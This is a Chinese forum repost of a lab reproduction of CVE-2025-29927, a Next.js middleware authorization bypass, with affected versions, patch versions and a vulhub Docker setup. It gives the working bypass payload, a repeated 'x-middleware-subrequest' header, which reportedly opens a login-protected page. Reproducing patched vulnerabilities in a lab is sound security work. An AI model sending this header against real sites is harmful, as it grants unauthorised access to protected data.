登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
签到
每天签到奖励2-10圆
导读
排行榜
TG频道
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
VIP申请
VIP网盘
网盘
联系我们
发帖说明
每日签到
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
科技
›
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现 ...
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
[ 复制链接 ]
仲秀娟
2025-6-7 16:08:02
免责声明
本文所述漏洞复现方法仅供安全研究及授权测试使用;任何个人/组织须在合法合规前提下实施,严禁用于非法目的。作者不对任何滥用行为及后果负责,如发现新漏洞请及时联系厂商并遵循漏洞披露规则。
漏洞信息
Next.js 是一个基于 React 的流行 Web 应用框架,提供服务器端渲染、静态网站生成和集成路由系统等功能。包含众多功能,是深入研究复杂研究的完美游乐场。在信念、好奇心和韧性的推动下,我们出发去探索它鲜为人知的方面,寻找等待被发现的隐藏宝藏。
当使用中间件进行身份验证和授权时,Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。
该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
补丁:
对于 Next.js 15.x,此问题已在 15.2.3 中修复
对于 Next.js 14.x,此问题已在 14.2.25 中修复
漏洞复现
vulhub已有环境:vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
启动环境:
docker compose up -d
复制代码
访问虚拟机3000端口,可以看到环境搭建成功:http://your-ip:3000/login
访问根路径,显示需要登陆:
添加请求头,使用权限绕过payload
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
复制代码
访问成功,权限绕过漏洞复现成功
参考文章
Next.js 和损坏的中间件:授权工件 - zhero_web_security (zhero-web-sec.github.io)
vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog (ch35tnut.com)
Next.js中间件授权绕过漏洞终极指南:CVE-2025-29927深度解析与防护策略 - 高效码农 (xugj520.cn)
Comparing v15.2.2...v15.2.3 · vercel/next.js (github.com)
代码审计知识星球 (zsxq.com)
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
CVE
2025
29927
Next
js
相关帖子
2025:大模型上线登记教程和实战经验分享
.NET周刊【9月第2期 2025-09-14】
mip泛目录2025程序
2025海丰杯WP
2025全球数字经济大会召开,天翼云息壤赋能园区高质量发展!
2025国庆Day5
有没一个js跳转代码啊
.NET周刊【9月第3期 2025-09-21】
.NET周刊【9月第3期 2025-09-21】
2025最新微信公众号文章数据批量导出excel工具1.0版
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
2025:大模型上线登记教程和实战经验分享
0
663
褐洌
2025-10-05
业界
.NET周刊【9月第2期 2025-09-14】
1
511
昝梓菱
2025-10-06
程序
mip泛目录2025程序
0
14
新程序
2025-10-06
科技
2025海丰杯WP
0
21
崔瑜然
2025-10-06
业界
2025全球数字经济大会召开,天翼云息壤赋能园区高质量发展!
2
992
谭皎洁
2025-10-06
安全
2025国庆Day5
0
987
甦忻愉
2025-10-06
问答
有没一个js跳转代码啊
1
23
VerlaMcCle
2025-10-07
业界
.NET周刊【9月第3期 2025-09-21】
0
908
讲怔
2025-10-08
业界
.NET周刊【9月第3期 2025-09-21】
0
602
骆熙华
2025-10-08
安全
2025最新微信公众号文章数据批量导出excel工具1.0版
0
299
孙淼淼
2025-10-11
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
代码
签约作者
程序园优秀签约作者
发帖
仲秀娟
2025-6-7 16:08:02
关注
0
粉丝关注
19
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994888
dage888
999994
3934307807
993690
4
富账慕
10007
5
柴古香
9992
6
匝抽
9986
7
筒濂
9980
8
孙淼淼
9989
9
凌彦慧
9985
10
崔瑜然
9984
查看更多